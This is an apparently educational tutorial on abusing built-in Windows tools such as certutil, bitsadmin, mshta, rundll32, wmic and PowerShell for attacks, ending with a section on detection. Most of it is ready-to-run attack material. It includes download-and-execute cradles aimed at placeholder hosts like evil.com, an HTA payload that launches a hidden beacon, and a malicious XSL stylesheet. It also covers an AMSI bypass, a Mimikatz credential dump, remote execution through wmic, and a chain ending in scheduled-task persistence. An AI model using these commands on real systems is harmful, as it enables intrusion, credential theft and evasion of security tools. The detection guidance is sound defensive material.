Living Off the Land: Execution Without Malware
Why upload malware that AV might catch when Windows already has everything you need built in? LOLBins (Living Off the Land Binaries) are Microsoft-signed tools that do exactly what attackers need.
The Core Concept
Every Windows system ships with dozens of utilities designed for legitimate administrative purposes. These tools can:
- Download files from the internet
- Execute arbitrary code
- Decode/encode data
- Connect to remote systems
- Modify system configurations
The key insight: Antivirus cannot flag Microsoft's own binaries without causing
massive false positives. If AV blocked powershell.exe, half of Windows administration
would break.
Traditional AV relies on signatures—known patterns of malicious code. LOLBin attacks use legitimate binaries in unexpected ways. There's no "malware" to detect, just Microsoft tools doing what they're designed to do.
LOLBin Categories
┌─────────────────────────────────────────────────────────────────────────────┐
│ LIVING OFF THE LAND BINARIES │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ DOWNLOADERS │ │ EXECUTORS │ │ UTILITIES │ │
│ ├─────────────────┤ ├─────────────────┤ ├─────────────────┤ │
│ │ • certutil │ │ • powershell │ │ • reg │ │
│ │ • bitsadmin │ │ • mshta │ │ • schtasks │ │
│ │ • curl │ │ • rundll32 │ │ • wmic │ │
│ │ • wget │ │ • regsvr32 │ │ • net │ │
│ │ • Invoke-WebReq │ │ • cscript/wscript│ │ • nltest │ │
│ └────────┬────────┘ └────────┬────────┘ └────────┬────────┘ │
│ │ │ │ │
│ └────────────────────┴────────────────────┘ │
│ │ │
│ ▼ │
│ ┌──────────────────────┐ │
│ │ ATTACK CHAINS │ │
│ │ │ │
│ │ Download → Execute │ │
│ │ → Persist → Beacon │ │
│ └──────────────────────┘ │
└─────────────────────────────────────────────────────────────────────────────┘
certutil.exe - The Swiss Army Knife
Legitimate purpose: Managing certificates, CRLs, and certificate stores.
Attacker use: Downloading files, encoding/decoding payloads, calculating hashes.
Downloading Files
# Download a file from the internet
# -urlcache: Use URL cache
# -split: Split the download
# -f: Force overwrite
certutil -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\legit.exe
# Quieter version (no progress output)
certutil -urlcache -split -f "http://evil.com/payload.exe" C:\Windows\Temp\update.exe >nul 2>&1Why it works: This is legitimate certutil functionality—it can download CRLs and certificates from URLs. The fact that the URL points to malware is irrelevant to the binary.
Decoding Base64 Payloads
# Attacker encodes payload as base64 to evade detection
# Then uses certutil to decode on target
# Encode (on attacker machine):
certutil -encode payload.exe payload.b64
# Decode (on victim machine):
certutil -decode payload.b64 payload.exe
# Execute
payload.exeThis bypasses many content inspection systems that look for executable headers (MZ/PE). The base64 blob looks like random text until decoded.
Calculating Hashes (Recon)
# Get file hashes - useful for verifying downloads or fingerprinting systems
certutil -hashfile C:\Windows\System32\cmd.exe MD5
certutil -hashfile C:\Windows\System32\cmd.exe SHA256Look for certutil.exe with command-line arguments containing:
-urlcachecombined with-fandhttp://-decodewith non-standard file paths- Any network connections from certutil.exe
Process lineage matters: certutil spawned by outlook.exe or word.exe is suspicious.
bitsadmin.exe - Background Intelligent Transfer
Legitimate purpose: Windows Update and other system downloads use BITS (Background Intelligent Transfer Service) to download files reliably.
Attacker use: Downloads files, often bypasses proxy restrictions because BITS is trusted for system updates.
# Create a download job
bitsadmin /transfer myDownloadJob /download /priority high ^
http://evil.com/payload.exe C:\Users\Public\update.exe
# More stealthy - create persistent job
bitsadmin /create myJob
bitsadmin /addfile myJob http://evil.com/payload.exe C:\Users\Public\update.exe
bitsadmin /setnotifycmdline myJob C:\Users\Public\update.exe NULL
bitsadmin /resume myJob
# Job persists across reboots until completeBITS downloads happen in the background, throttle based on network usage, and resume automatically if interrupted. The traffic often bypasses proxy inspection because Windows Update needs BITS to work.
mshta.exe - HTML Application Host
Legitimate purpose: Runs HTML Applications (.hta files), which are HTML/JavaScript/VBScript applications that run with full system access.
Attacker use: Execute scripts from URLs, run inline code, bypass application whitelisting.
# Execute remote HTA file
mshta http://evil.com/payload.hta
# Execute inline VBScript
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -c IEX(IWR 'http://evil.com/script.ps1')"":close")
# Execute inline JavaScript
mshta javascript:a=GetObject("script:http://evil.com/payload.sct").Exec();close();Sample HTA Payload
<!-- payload.hta - runs when opened with mshta -->
<html>
<head>
<script language="VBScript">
Sub Window_OnLoad
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ep bypass -w hidden -c ""IEX(New-Object Net.WebClient).DownloadString('http://c2/beacon.ps1')""", 0
window.close
End Sub
</script>
</head>
<body>
</body>
</html>rundll32.exe - DLL Loader
Legitimate purpose: Execute functions exported from DLL files.
Attacker use: Execute arbitrary code through DLL sideloading, run JavaScript, abuse COM objects.
# Execute a function from a DLL
rundll32.exe payload.dll,EntryPoint
# Execute JavaScript via mshtml
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").Run("calc.exe")
# Execute script via url.dll
rundll32.exe url.dll,OpenURL "http://evil.com/payload.hta"
# Execute via shell32.dll (opens URL in default handler)
rundll32.exe shell32.dll,ShellExec_RunDLL "http://evil.com/payload.hta"wmic.exe - WMI Command Line
Legitimate purpose: Windows Management Instrumentation command-line interface. System administration, querying hardware/software info, remote management.
Attacker use: Remote code execution, lateral movement, reconnaissance.
Remote Process Execution
# Execute process on remote machine (lateral movement)
wmic /node:192.168.1.50 /user:DOMAIN\admin /password:P@ssw0rd process call create "powershell -ep bypass -file \\attacker\share\payload.ps1"
# Execute on multiple machines
wmic /node:@targets.txt process call create "cmd.exe /c whoami > C:\temp\output.txt"Local Reconnaissance
# Get OS info
wmic os get caption,version,buildnumber,osarchitecture
# List installed software
wmic product get name,version
# List running processes
wmic process list brief
# Get antivirus products
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname,productstate
# Get startup programs
wmic startup list full
# Get user accounts
wmic useraccount list briefXSL Script Execution (Advanced)
# wmic can execute remote XSL stylesheets containing JScript
wmic os get /format:"http://evil.com/payload.xsl"<!-- payload.xsl - executed by wmic -->
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</ms:script>
<template match="/">
<value-of select="user:a()"/>
</template>
</stylesheet>PowerShell - The Ultimate LOLBin
PowerShell is so powerful for attackers that it deserves special attention. It's a full programming language with direct access to .NET, COM objects, and Windows APIs.
Download and Execute (Fileless)
# Classic download cradle - executes entirely in memory
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/Invoke-Mimikatz.ps1')
# More evasive version with proper headers
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX $wc.DownloadString('https://legitimate-looking-cdn.com/jquery.min.js')
# Using Invoke-WebRequest (PowerShell 3.0+)
IEX (Invoke-WebRequest -Uri 'http://evil.com/script.ps1' -UseBasicParsing).Content
# Downloading to disk
Invoke-WebRequest -Uri 'http://evil.com/payload.exe' -OutFile 'C:\Users\Public\update.exe'Encoded Commands
# PowerShell accepts base64-encoded commands via -EncodedCommand (-enc)
# This bypasses simple command-line logging that looks for keywords
# Encode a command (on attacker machine):
$command = 'IEX (New-Object Net.WebClient).DownloadString("http://evil.com/script.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Write-Host $encoded
# Execute on victim:
powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA==
# Common evasion flags:
# -ExecutionPolicy Bypass (-ep bypass) - ignore execution policy
# -WindowStyle Hidden (-w hidden) - no visible window
# -NoProfile (-nop) - don't load profile scripts
# -NonInteractive (-noni) - no interactive prompts
powershell -ep bypass -w hidden -nop -noni -enc [base64]AMSI Bypass Techniques
AMSI (Antimalware Scan Interface) lets AV scan PowerShell commands before execution. Attackers attempt to bypass it:
# These are examples for educational purposes - specific bypasses get patched quickly
# Reflection-based bypass (manipulates AMSI in memory)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# String obfuscation to avoid signature detection
$a = 'System.Management.Automation.A'+'msiUtils'
# ... continued manipulation
# Loading from memory to avoid disk-based scanning
# Assembly loaded directly into memory, never touches diskPowerShell logging is critical. Enable:
- Script Block Logging: Captures the actual code executed (decoded)
- Module Logging: Logs module and cmdlet usage
- Transcription: Full transcript of all PowerShell sessions
Even with -enc, Script Block Logging captures the decoded command.
Full Attack Chain Example
Here's how these tools chain together in a real attack:
┌─────────────────────────────────────────────────────────────────────────────┐ │ ATTACK CHAIN EXAMPLE │ ├─────────────────────────────────────────────────────────────────────────────┤ │ │ │ STEP 1: INITIAL EXECUTION │ │ ┌────────────────────────────────────────────────────────────────────┐ │ │ │ User opens malicious document or clicks phishing link │ │ │ │ Document macro or HTA executes: │ │ │ │ │ │ │ │ mshta http://evil.com/stage1.hta │ │ │ └───────────────────────────────┬────────────────────────────────────┘ │ │ │ │ │ ▼ │ │ STEP 2: DOWNLOAD NEXT STAGE │ │ ┌────────────────────────────────────────────────────────────────────┐ │ │ │ stage1.hta contains VBScript that runs: │ │ │ │ │ │ │ │ certutil -urlcache -split -f http://evil.com/beacon.exe │ │ │ │ C:\Users\Public\WindowsUpdate.exe │ │ │ └───────────────────────────────┬────────────────────────────────────┘ │ │ │ │ │ ▼ │ │ STEP 3: ESTABLISH PERSISTENCE │ │ ┌────────────────────────────────────────────────────────────────────┐ │ │ │ Create scheduled task for persistence: │ │ │ │ │ │ │ │ schtasks /create /tn "Windows Update Check" /tr │ │ │ │ "C:\Users\Public\WindowsUpdate.exe" /sc hourly /ru SYSTEM │ │ │ └───────────────────────────────┬────────────────────────────────────┘ │ │ │ │ │ ▼ │ │ STEP 4: EXECUTE BEACON │ │ ┌────────────────────────────────────────────────────────────────────┐ │ │ │ rundll32.exe C:\Users\Public\WindowsUpdate.exe,Start │ │ │ │ │ │ │ │ Or just run the .exe directly. Beacon starts phoning home. │ │ │ └───────────────────────────────┬────────────────────────────────────┘ │ │ │ │ │ ▼ │ │ STEP 5: POST-EXPLOITATION (via C2) │ │ ┌────────────────────────────────────────────────────────────────────┐ │ │ │ Commands sent through beacon, executed with LOLBins: │ │ │ │ │ │ │ │ # Reconnaissance │ │ │ │ wmic os get caption,version │ │ │ │ net user /domain │ │ │ │ │ │ │ │ # Credential access │ │ │ │ powershell IEX(IWR 'http://c2/Invoke-Mimikatz.ps1') │ │ │ │ │ │ │ │ # Lateral movement │ │ │ │ wmic /node:target process call create "beacon.exe" │ │ │ └────────────────────────────────────────────────────────────────────┘ │ │ │ │ RESULT: Full compromise using only Microsoft-signed binaries │ │ No "malware" on disk except the beacon (which could also │ │ be memory-only with more sophisticated techniques) │ │ │ └─────────────────────────────────────────────────────────────────────────────┘
Memory-Only (Fileless) Execution
The most sophisticated attacks never write malware to disk. Everything executes in memory.
# Download and execute script - nothing on disk
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/Invoke-Mimikatz.ps1')
# The script defines functions in memory
# Execute the function
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
# Results sent back through C2 channel
# Script unloaded when PowerShell process ends
# No file artifacts to findReflective DLL Loading
Advanced technique: load a DLL directly into memory without touching disk or using standard Windows loader.
# Conceptual example - reflective loading
# Download DLL bytes
$bytes = (New-Object Net.WebClient).DownloadData('http://evil.com/payload.dll')
# Allocate memory and write DLL
$addr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length)
[System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $addr, $bytes.Length)
# Parse PE headers, fix relocations, resolve imports, execute
# (Complex code omitted - this is what tools like Cobalt Strike do)Detection Strategies
Since you can't block these binaries, focus on detecting abnormal usage patterns.
Process Lineage Analysis
The most powerful detection: look at parent-child process relationships.
| Suspicious Chain | Why It's Suspicious |
|---|---|
outlook.exe → cmd.exe → powershell.exe |
Outlook shouldn't spawn shells |
winword.exe → powershell.exe |
Word macros spawning PowerShell |
excel.exe → wmic.exe |
Excel shouldn't use WMI |
mshta.exe → powershell.exe |
HTA applications rarely need PowerShell |
rundll32.exe with network connections |
rundll32 rarely makes network calls |
certutil.exe downloading files |
Legitimate use is rare |
Command-Line Arguments
# Suspicious patterns to alert on:
# PowerShell
-enc # Encoded commands
-ep bypass # Execution policy bypass
-w hidden # Hidden window
DownloadString # Downloading code
IEX # Invoke-Expression
Net.WebClient # Web downloading
FromBase64String # Decoding operations
# certutil
-urlcache -f http # Downloading files
# mshta
http:// # Loading remote HTAs
vbscript: # Inline VBScript
javascript: # Inline JavaScript
# wmic
/node: # Remote execution
process call create # Creating processes
/format:http # Loading remote XSLEDR Detection Points
- Script Block Logging: Captures decoded PowerShell before execution
- Module Load Events: Detect unusual DLLs being loaded
- Network Connections: Track which processes make network calls
- File Creation: Files appearing in unusual locations
- Registry Modifications: Persistence mechanism creation
Resources
- LOLBAS Project - Comprehensive LOLBin documentation
- MITRE ATT&CK - Framework mapping techniques to detection
- Nishang - PowerShell offensive toolkit